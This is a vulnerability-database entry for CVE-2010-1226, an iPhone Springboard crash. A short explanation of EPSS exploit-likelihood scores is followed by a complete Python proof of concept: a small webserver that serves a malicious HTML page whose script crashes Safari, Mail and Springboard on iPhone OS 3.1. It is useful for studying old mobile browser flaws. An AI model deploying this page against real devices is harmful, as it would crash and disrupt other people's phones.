CVE-2010-1226 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

#!/usr/bin/python #iPhone Springboard crash PoC by Chase Higgins. Devices tested: iPhone 2G @ OS 3.1, iPhone 3GS @ 3.1.3 #this script acts as webserver, and causes Safari, as well as Mail and Springboard to crash #all these apps crash after running this exploit on the iPhone. Unable to debug any of these processes as the gdb on my #device is acting up, original iPhone is just too low memory to further test this exploit, so I am releasing it # Exploit Title: iPhone Springboard Malformed Character Crash PoC # Date: 3/15/2010 # Author: Chase Higgins # Software Link: apple.com/iphone/ # Version: iPhone 2G, iPhone 3GS # Tested on: iPhone OS 3.1, and iPhone OS 3.1.3 # CVE : # Code : none import sys, socket; def main(): html = """ <html> <head> <script> function triggerCrash(){ evil_div = document.getElementById('evilDiv'); var evil_string = "\x4e\x5b\x01"; i = 0; while (i < 1000){ evil_string = evil_string + evil_string; } evil_div.innerHTML = evil_string; } </script> </head> <body onLoad="triggerCrash()"> <div id="evilDiv"> </div> </body> </html> """; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.bind(('',2121)); s.listen(1); while True: channel, details = s.accept(); print channel.recv(1024); channel.send(html); channel.close(); main();